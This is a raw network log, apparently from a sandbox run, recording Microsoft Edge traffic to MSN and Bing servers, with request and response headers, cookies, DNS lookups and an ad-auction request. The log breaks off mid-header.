last-modified: Thu, 27 Mar 2025 07:40:37 GMT
request-context: appId=cid-v1:717fa162-f278-4346-8db0-a87eef8f559e
x-datacenter: northeu
x-activityid: 52e38f83-d740-4471-9d6e-14637996f34e
timing-allow-origin: *
x-frame-options: deny
x-resizerversion: 1.0
content-type: image/png
content-location: https://img.s-msn.com/tenant/amp/entityid/AA18wU7w
x-source-length: 73519
content-length: 73519
cache-control: public, max-age=281325
expires: Tue, 01 Apr 2025 07:39:20 GMT
date: Sat, 29 Mar 2025 01:30:35 GMT
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.1}
GET

https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAc9vHK.img

msedge.exe

Remote address:

2.19.252.151:443

Request

GET /tenant/amp/entityid/AAc9vHK.img HTTP/2.0
host: img-s-msn-com.akamaized.net
sec-ch-ua-platform: "Windows"
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Edg/133.0.0.0
sec-ch-ua: "Not(A:Brand";v="99", "Microsoft Edge";v="133", "Chromium";v="133"
dnt: 1
sec-ch-ua-mobile: ?0
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
sec-fetch-storage-access: active
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
if-modified-since: Wed, 12 Mar 2025 02:56:15 GMT
priority: u=1, i

Response

HTTP/2.0 200

access-control-allow-origin: *
last-modified: Wed, 26 Mar 2025 00:26:43 GMT
x-datacenter: eastus
x-activityid: 1275021a-1697-4e39-bd0e-efe59dc72a8a
timing-allow-origin: *
x-frame-options: deny
x-resizerversion: 1.0
request-context: appId=cid-v1:f86a8422-c8db-4918-8103-8c50f2f128b8
content-type: image/png
content-location: https://img.s-msn.com/tenant/amp/entityid/AAc9vHK
x-source-length: 1218
content-length: 1218
cache-control: public, max-age=168875
expires: Mon, 31 Mar 2025 00:25:10 GMT
date: Sat, 29 Mar 2025 01:30:35 GMT
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.1}
GET

https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAdSfFf.img

msedge.exe

Remote address:

2.19.252.151:443

Request

GET /tenant/amp/entityid/AAdSfFf.img HTTP/2.0
host: img-s-msn-com.akamaized.net
sec-ch-ua-platform: "Windows"
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Edg/133.0.0.0
sec-ch-ua: "Not(A:Brand";v="99", "Microsoft Edge";v="133", "Chromium";v="133"
dnt: 1
sec-ch-ua-mobile: ?0
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
sec-fetch-storage-access: active
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
if-modified-since: Tue, 04 Mar 2025 16:13:56 GMT
priority: u=1, i

Response

HTTP/2.0 200

access-control-allow-origin: *
last-modified: Sat, 22 Mar 2025 16:18:32 GMT
request-context: appId=cid-v1:f86a8422-c8db-4918-8103-8c50f2f128b8
x-datacenter: eastap
x-activityid: 9c5f2246-266f-4424-851d-5a4b0c8edab7
timing-allow-origin: *
x-frame-options: deny
x-resizerversion: 1.0
content-type: image/png
content-location: https://img.s-msn.com/tenant/amp/entityid/AAdSfFf
x-source-length: 1858
content-length: 1858
cache-control: public, max-age=269310
expires: Tue, 01 Apr 2025 04:19:05 GMT
date: Sat, 29 Mar 2025 01:30:35 GMT
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.1}
GET

https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1rk2ap.img

msedge.exe

Remote address:

2.19.252.151:443

Request

GET /tenant/amp/entityid/AA1rk2ap.img HTTP/2.0
host: img-s-msn-com.akamaized.net
sec-ch-ua-platform: "Windows"
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Edg/133.0.0.0
sec-ch-ua: "Not(A:Brand";v="99", "Microsoft Edge";v="133", "Chromium";v="133"
dnt: 1
sec-ch-ua-mobile: ?0
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
sec-fetch-storage-access: active
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
if-modified-since: Wed, 12 Mar 2025 11:56:09 GMT
priority: u=1, i

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
content-location: https://img.s-msn.com/tenant/amp/entityid/AA1rk2ap
last-modified: Fri, 21 Mar 2025 11:58:10 GMT
request-context: appId=cid-v1:d5b41889-006a-41de-83b1-512c7c564dfe
x-source-length: 2005
x-datacenter: eastus
x-activityid: 3c44531d-2035-415a-ab1e-07cf184d5771
timing-allow-origin: *
x-frame-options: deny
x-resizerversion: 1.0
content-length: 2005
cache-control: public, max-age=167273
expires: Sun, 30 Mar 2025 23:58:28 GMT
date: Sat, 29 Mar 2025 01:30:35 GMT
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.1}
GET

https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB107UWq.img

msedge.exe

Remote address:

2.19.252.151:443

Request

GET /tenant/amp/entityid/BB107UWq.img HTTP/2.0
host: img-s-msn-com.akamaized.net
sec-ch-ua-platform: "Windows"
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Edg/133.0.0.0
sec-ch-ua: "Not(A:Brand";v="99", "Microsoft Edge";v="133", "Chromium";v="133"
dnt: 1
sec-ch-ua-mobile: ?0
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
sec-fetch-storage-access: active
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
if-modified-since: Tue, 11 Mar 2025 03:34:54 GMT
priority: u=1, i

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
content-location: https://img.s-msn.com/tenant/amp/entityid/AA12sf7A?w=0&h=0&q=60&m=6&f=jpg&u=t
last-modified: Thu, 20 Mar 2025 19:57:58 GMT
x-source-length: 114962
x-datacenter: westus
x-activityid: 2f992ca2-df9a-48a0-a1c5-6ec6e85e2d65
timing-allow-origin: *
x-frame-options: deny
x-resizerversion: 1.0
content-length: 131072
cache-control: public, max-age=109545
expires: Sun, 30 Mar 2025 07:56:20 GMT
date: Sat, 29 Mar 2025 01:30:35 GMT
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.1}
GET

https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA12sf7A?w=0&h=0&q=60&m=6&f=jpg&u=t

msedge.exe

Remote address:

2.19.252.151:443

Request

GET /tenant/amp/entityid/AA12sf7A?w=0&h=0&q=60&m=6&f=jpg&u=t HTTP/2.0
host: img-s-msn-com.akamaized.net
sec-ch-ua-platform: "Windows"
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Edg/133.0.0.0
sec-ch-ua: "Not(A:Brand";v="99", "Microsoft Edge";v="133", "Chromium";v="133"
dnt: 1
sec-ch-ua-mobile: ?0
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
sec-fetch-storage-access: active
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
priority: i

Response

HTTP/2.0 304

content-type: image/png
last-modified: Tue, 11 Mar 2025 03:34:54 GMT
cache-control: public, max-age=50580
expires: Sat, 29 Mar 2025 15:33:35 GMT
date: Sat, 29 Mar 2025 01:30:35 GMT
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.1}
GET

https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1msDBP?w=0&h=0&q=60&m=6&f=jpg&u=t

msedge.exe

Remote address:

2.19.252.151:443

Request

GET /tenant/amp/entityid/BB1msDBP?w=0&h=0&q=60&m=6&f=jpg&u=t HTTP/2.0
host: img-s-msn-com.akamaized.net
sec-ch-ua-platform: "Windows"
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Edg/133.0.0.0
sec-ch-ua: "Not(A:Brand";v="99", "Microsoft Edge";v="133", "Chromium";v="133"
dnt: 1
sec-ch-ua-mobile: ?0
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
sec-fetch-storage-access: active
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
priority: i

Response

HTTP/2.0 200

access-control-allow-origin: *
last-modified: Tue, 25 Mar 2025 08:01:26 GMT
x-datacenter: eastus
x-activityid: 648c8731-9a13-480d-ac03-17cc9020e59c
timing-allow-origin: *
x-frame-options: deny
x-resizerversion: 1.0
content-type: image/jpeg
content-location: https://img.s-msn.com/tenant/amp/entityid/BB1msDBP?w=0&h=0&q=60&m=6&f=jpg&u=t
x-source-length: 59155
content-length: 65536
cache-control: public, max-age=109795
expires: Sun, 30 Mar 2025 08:00:30 GMT
date: Sat, 29 Mar 2025 01:30:35 GMT
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.1}
GET

https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1msDML?w=0&h=0&q=60&m=6&f=jpg&u=t

msedge.exe

Remote address:

2.19.252.151:443

Request

GET /tenant/amp/entityid/BB1msDML?w=0&h=0&q=60&m=6&f=jpg&u=t HTTP/2.0
host: img-s-msn-com.akamaized.net
sec-ch-ua-platform: "Windows"
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Edg/133.0.0.0
sec-ch-ua: "Not(A:Brand";v="99", "Microsoft Edge";v="133", "Chromium";v="133"
dnt: 1
sec-ch-ua-mobile: ?0
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
sec-fetch-storage-access: active
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
priority: i

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
content-location: https://img.s-msn.com/tenant/amp/entityid/BB1msDML?w=0&h=0&q=60&m=6&f=jpg&u=t
last-modified: Thu, 20 Mar 2025 19:58:29 GMT
request-context: appId=cid-v1:717fa162-f278-4346-8db0-a87eef8f559e
x-source-length: 86931
x-datacenter: northeu
x-activityid: d5433f5a-3cf2-4394-8c40-c085914c2966
timing-allow-origin: *
x-frame-options: deny
x-resizerversion: 1.0
content-length: 131072
cache-control: public, max-age=109686
expires: Sun, 30 Mar 2025 07:58:41 GMT
date: Sat, 29 Mar 2025 01:30:35 GMT
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.1}
GET

https://c.msn.com/c.gif?rnd=1743211833396&udc=true&pg.n=default&pg.t=dhp&pg.c=2083&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-gb&rid=583592b502f9469cba059551f752edaf&activityId=583592b502f9469cba059551f752edaf&d.imd=false&scr=1280x720&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=F389EF4220A144399D7923EC5F6AD764&MUID=1BCC9635343F60E02399838B3518610E

msedge.exe

Remote address:

13.74.129.1:443

Request

GET /c.gif?rnd=1743211833396&udc=true&pg.n=default&pg.t=dhp&pg.c=2083&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-gb&rid=583592b502f9469cba059551f752edaf&activityId=583592b502f9469cba059551f752edaf&d.imd=false&scr=1280x720&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=F389EF4220A144399D7923EC5F6AD764&MUID=1BCC9635343F60E02399838B3518610E HTTP/2.0
host: c.msn.com
sec-ch-ua-platform: "Windows"
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Edg/133.0.0.0
sec-ch-ua: "Not(A:Brand";v="99", "Microsoft Edge";v="133", "Chromium";v="133"
dnt: 1
sec-ch-ua-mobile: ?0
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-edge-shopping-flag: 0
sec-ms-gec: 87D8E2F0684282DF6DE350AC7863058B54E0BD2F3A683830CF6A57A64DC4065D
sec-ms-gec-version: 1-133.0.3065.69
x-client-data: eyIxIjoiMCIsIjIiOiIwIiwiMyI6IjAiLCI0IjoiNTI1OTQxMTIwODk0MjAwMzY1OSIsIjYiOiJzdGFibGUiLCI5IjoiZGVza3RvcCJ9
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: USRLOC=
cookie: _EDGE_V=1
cookie: MUID=1BCC9635343F60E02399838B3518610E
cookie: _EDGE_S=F=1&SID=1E62984E5275615728728DF0538A60A8
cookie: SM=T
cookie: OptanonConsent=isGpcEnabled=0&datestamp=Sat+Mar+29+2025+01%3A30%3A33+GMT%2B0000+(Coordinated+Universal+Time)&version=202408.1.0&browserGpcFlag=0&isIABGlobal=false&hosts=&landingPath=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26startpage%3D1%26PC%3DU531&groups=C0001%3A1%2CC0003%3A0%2CC0002%3A0%2CC0004%3A0%2CV2STACK42%3A0
priority: i

Response

HTTP/2.0 200

cache-control: private, no-cache, proxy-revalidate, no-store
pragma: no-cache
content-type: image/gif
last-modified: Mon, 17 Mar 2025 17:05:06 GMT
accept-ranges: bytes
etag: "69895dbb5e97db1:0"
server: Microsoft-IIS/10.0
x-powered-by: ASP.NET
p3p: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
set-cookie: SM=C; domain=c.msn.com; path=/; SameSite=None; Secure;
set-cookie: MUID=1BCC9635343F60E02399838B3518610E; domain=.msn.com; expires=Thu, 23-Apr-2026 01:30:35 GMT; path=/; SameSite=None; Secure; Priority=High;
set-cookie: SRM_M=1BCC9635343F60E02399838B3518610E; domain=c.msn.com; expires=Thu, 23-Apr-2026 01:30:35 GMT; path=/; SameSite=None; Secure;
set-cookie: MR=0; domain=c.msn.com; expires=Sat, 05-Apr-2025 01:30:35 GMT; path=/; SameSite=None; Secure;
set-cookie: ANONCHK=0; domain=c.msn.com; expires=Sat, 29-Mar-2025 01:40:35 GMT; path=/; SameSite=None; Secure;
date: Sat, 29 Mar 2025 01:30:35 GMT
content-length: 42
GET

https://www.bing.com/api/shopping/v1/user/shoppingsettings?EnabledServiceFeaturesv2=edgeServerUX.shopping.aablockth,edgeServerUX.shopping.block99,edgeServerUX.shopping.disableCashbackOnCouponCopy,edgeServerUX.shopping.migrateClippingToOmnibox,edgeServerUX.shopping.msEdgeShoppingCashbackDismissTimeout2s

msedge.exe

Remote address:

95.101.143.201:443

Request

GET /api/shopping/v1/user/shoppingsettings?EnabledServiceFeaturesv2=edgeServerUX.shopping.aablockth,edgeServerUX.shopping.block99,edgeServerUX.shopping.disableCashbackOnCouponCopy,edgeServerUX.shopping.migrateClippingToOmnibox,edgeServerUX.shopping.msEdgeShoppingCashbackDismissTimeout2s HTTP/2.0
host: www.bing.com
cookie: ANON=
cookie: MUID=
cookie: _RwBf=
cookie:
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
sec-fetch-storage-access: active
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Edg/133.0.0.0
accept-encoding: gzip, deflate, br, zsdch, zstd
accept-language: en-US,en;q=0.9
priority: u=4, i

Response

HTTP/2.0 200

cache-control: max-age=0, no-cache, no-store, must-revalidate
content-type: application/json; charset=utf-8
content-encoding: br
vary: Accept-Encoding
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 37CCBD9DA12644F9A8BD6778293634FA Ref B: LON04EDGE0711 Ref C: 2025-03-29T01:30:35Z
date: Sat, 29 Mar 2025 01:30:35 GMT
content-length: 425
set-cookie: _EDGE_S=F=1&SID=043AA6DB11BC6D4920F3B365109B6C62; path=/; httponly; domain=bing.com
set-cookie: _EDGE_V=1; path=/; httponly; expires=Thu, 23-Apr-2026 01:30:35 GMT; domain=bing.com
set-cookie: MUID=22C96998E2146B0301737C26E3336A2A; samesite=none; path=/; secure; expires=Thu, 23-Apr-2026 01:30:35 GMT; domain=bing.com
set-cookie: MUIDB=22C96998E2146B0301737C26E3336A2A; path=/; httponly; expires=Thu, 23-Apr-2026 01:30:35 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.40367a5c.1743211835.64c1dc0
DNS

srtb.msn.com

msedge.exe

Remote address:

8.8.8.8:53

Request

srtb.msn.com

IN A

Response

srtb.msn.com

IN CNAME

srtb-msn-com-profile.trafficmanager.net

srtb-msn-com-profile.trafficmanager.net

IN CNAME

www-msn-com.a-0003.a-msedge.net

www-msn-com.a-0003.a-msedge.net

IN CNAME

a-0003.a-msedge.net

a-0003.a-msedge.net

IN A

204.79.197.203
DNS

srtb.msn.com

msedge.exe

Remote address:

8.8.8.8:53

Request

srtb.msn.com

IN Unknown

Response

srtb.msn.com

IN CNAME

srtb-msn-com-profile.trafficmanager.net

srtb-msn-com-profile.trafficmanager.net

IN CNAME

www-msn-com.a-0003.a-msedge.net
DNS

objects.githubusercontent.com

futors.exe

Remote address:

8.8.8.8:53

Request

objects.githubusercontent.com

IN A

Response

objects.githubusercontent.com

IN A

185.199.110.133

objects.githubusercontent.com

IN A

185.199.111.133

objects.githubusercontent.com

IN A

185.199.108.133

objects.githubusercontent.com

IN A

185.199.109.133
GET

https://srtb.msn.com/notify/served?rid=583592b502f9469cba059551f752edaf&r=river&i=2&p=edgechrntp&l=en-gb&d=bing&b=Edg&a=b44fd1cb-393c-438a-ad3a-96eced77e919&ii=1&c=15307070020947675874&bid=eabfce7d-c15d-4dc8-b40c-0e4cfb8ad10c&tid=edgechrntp-river-2&ptid=edgechrntp-peekriver-2

msedge.exe

Remote address:

204.79.197.203:443

Request

GET /notify/served?rid=583592b502f9469cba059551f752edaf&r=river&i=2&p=edgechrntp&l=en-gb&d=bing&b=Edg&a=b44fd1cb-393c-438a-ad3a-96eced77e919&ii=1&c=15307070020947675874&bid=eabfce7d-c15d-4dc8-b40c-0e4cfb8ad10c&tid=edgechrntp-river-2&ptid=edgechrntp-peekriver-2 HTTP/2.0
host: srtb.msn.com
sec-ch-ua-platform: "Windows"
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Edg/133.0.0.0
sec-ch-ua: "Not(A:Brand";v="99", "Microsoft Edge";v="133", "Chromium";v="133"
dnt: 1
sec-ch-ua-mobile: ?0
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-edge-shopping-flag: 0
sec-ms-gec: 87D8E2F0684282DF6DE350AC7863058B54E0BD2F3A683830CF6A57A64DC4065D
sec-ms-gec-version: 1-133.0.3065.69
x-client-data: eyIxIjoiMCIsIjIiOiIwIiwiMyI6IjAiLCI0IjoiNTI1OTQxMTIwODk0MjAwMzY1OSIsIjYiOiJzdGFibGUiLCI5IjoiZGVza3RvcCJ9
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: USRLOC=
cookie: _EDGE_V=1
cookie: MUID=1BCC9635343F60E02399838B3518610E
cookie: _EDGE_S=F=1&SID=1E62984E5275615728728DF0538A60A8
cookie: OptanonConsent=isGpcEnabled=0&datestamp=Sat+Mar+29+2025+01%3A30%3A33+GMT%2B0000+(Coordinated+Universal+Time)&version=202408.1.0&browserGpcFlag=0&isIABGlobal=false&hosts=&landingPath=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26startpage%3D1%26PC%3DU531&groups=C0001%3A1%2CC0003%3A0%2CC0002%3A0%2CC0004%3A0%2CV2STACK42%3A0
cookie: _C_ETH=1
cookie: msnup=%7B%22cnex%22%3A%22no%22%7D
priority: i

Response

HTTP/2.0 204

cache-control: no-cache
pragma: no-cache
content-type: image/gif
expires: -1
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-content-type-options: nosniff
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 0525884B746648588D828447A2E490E9 Ref B: LON04EDGE0716 Ref C: 2025-03-29T01:30:36Z
date: Sat, 29 Mar 2025 01:30:35 GMT
GET

https://srtb.msn.com/notify/served?rid=583592b502f9469cba059551f752edaf&r=river&i=1&p=edgechrntp&l=en-gb&d=bing&b=Edg&a=6dae3265-8902-456c-a2d0-2bcb5050c551&ii=1&c=6847503952953801078&bid=eabfce7d-c15d-4dc8-b40c-0e4cfb8ad10c&tid=edgechrntp-river-1&ptid=edgechrntp-peekriver-1

msedge.exe

Remote address:

204.79.197.203:443

Request

GET /notify/served?rid=583592b502f9469cba059551f752edaf&r=river&i=1&p=edgechrntp&l=en-gb&d=bing&b=Edg&a=6dae3265-8902-456c-a2d0-2bcb5050c551&ii=1&c=6847503952953801078&bid=eabfce7d-c15d-4dc8-b40c-0e4cfb8ad10c&tid=edgechrntp-river-1&ptid=edgechrntp-peekriver-1 HTTP/2.0
host: srtb.msn.com
sec-ch-ua-platform: "Windows"
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Edg/133.0.0.0
sec-ch-ua: "Not(A:Brand";v="99", "Microsoft Edge";v="133", "Chromium";v="133"
dnt: 1
sec-ch-ua-mobile: ?0
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-edge-shopping-flag: 0
sec-ms-gec: 87D8E2F0684282DF6DE350AC7863058B54E0BD2F3A683830CF6A57A64DC4065D
sec-ms-gec-version: 1-133.0.3065.69
x-client-data: eyIxIjoiMCIsIjIiOiIwIiwiMyI6IjAiLCI0IjoiNTI1OTQxMTIwODk0MjAwMzY1OSIsIjYiOiJzdGFibGUiLCI5IjoiZGVza3RvcCJ9
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: USRLOC=
cookie: _EDGE_V=1
cookie: MUID=1BCC9635343F60E02399838B3518610E
cookie: _EDGE_S=F=1&SID=1E62984E5275615728728DF0538A60A8
cookie: OptanonConsent=isGpcEnabled=0&datestamp=Sat+Mar+29+2025+01%3A30%3A33+GMT%2B0000+(Coordinated+Universal+Time)&version=202408.1.0&browserGpcFlag=0&isIABGlobal=false&hosts=&landingPath=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26startpage%3D1%26PC%3DU531&groups=C0001%3A1%2CC0003%3A0%2CC0002%3A0%2CC0004%3A0%2CV2STACK42%3A0
cookie: _C_ETH=1
cookie: msnup=%7B%22cnex%22%3A%22no%22%7D
priority: i

Response

HTTP/2.0 204

cache-control: no-cache
pragma: no-cache
content-type: image/gif
expires: -1
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-content-type-options: nosniff
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 1AE9CF5EE5274F098C87ADFC648B554F Ref B: LON04EDGE0716 Ref C: 2025-03-29T01:30:36Z
date: Sat, 29 Mar 2025 01:30:35 GMT
POST

https://srtb.msn.com/auction

msedge.exe

Remote address:

204.79.197.203:443

Request

POST /auction HTTP/2.0
host: srtb.msn.com
content-length: 2046
sec-ch-ua-platform: "Windows"
cache-control: no-cache
sec-ch-ua: "Not(A:Brand";v="99", "Microsoft Edge";v="133", "Chromium";v="133"
x-msedge-market: en-gb
sec-ch-ua-mobile: ?0
x-ms-flightid: msnallexpusers,prg-sp-liveapi,prg-1sw-cc-calfbv,1s-webembeddings-fbv6,prg-1sw-sa-calfbv,otvendor-t,prg-1sw-sa-cfmigt1,prg-1sw-sa-maiprofilev2t1,prg-1sw-saw-prc1,prg-1sw-sa-enrel152t3,prg-1sw-preview-c,prg-1sw-p1-ebsupp-t2,1s-wpo-pr1-sdcrxv1,prg-adspeek,prg-1sw-profdbk,prg-1sw-ntf-coolv1,1s-ntf1-cp2coold,traffic-pr2-tskb-car,prg-pr2-tskb-car,prg-1sw-p2-ebsupp-ctrl,prg-pr2-marketsel-t,1s-p2-igndashcm,prg-pr2-marketsel,btie-cp-t2,btie-ovradnt-c,1s-fcrypt,prg-ctr-pnpc,1s-wpo-pr2-sizectr,1s-wpo-pr2-clc-17sld-c,prg-pr2-ntf-dmsdtbrst2,1s-wpo-pr2-dmsd,prg-1sw-dmpren,prg-1sw-dmpvp2si,prg-1sw-sdcdp2,prg-1sw-sdpvp2,prg-dm-explore,prg-upsaip-w1-t,1s-rpssecautht,prg-pr2-contextfeed1,1s-contextual,prg-1sw-sa-context_t1,prg-pr2-tbrcsmpt-rf,chatn_v2_t1,ntp-plch-hdr,inln-sic-ntp-c,prg-brightindarkho,prg-ntp-glasi,prg-sw-ctrlph,prg-ntp-easclh,prg-ntp-lypperfr,1s-wpo-layouttmpl,prg-ntp-promoperfr,1s-wpo-pr2-sdcrx-c,2412-i-ncof-t,prg-csacclink,prg-1s-acclnk,prg-accountlink,1s-notifmapping,1s-shp-rc-t-gedgev3,prg-wx-dhgrd,prg-sh-rmitmlnk,prg-shopping-api,nopinglancecardit,prg-cg-notf-landing-t,prg-cg-notf-sub,prg-cg-notf-sub-btn,prg-ntp-tsm-32,ads-nopostsq-t,ads-nopostsq,1s-uasdisf-t,ads-creativelog,ads-usepme,ads-anjson-migt,sh-bdvid,prg-sh-bd-video,1s-vidconxap-c,ads-nooutbrain,release-outlook-app,ads-prcrid-bi,ads-fbk-gserver,cg-ab-testing-c,prg-1sw-tvid-t20,1s-p1-vid-vs,prg-1sw-tvid-p1,prg-1sw-videopb,prg-1sw-videosxap,prg-p1-txt2,prg-p1-uc3,prg-pr1-videos,prg-tv-api,prg-t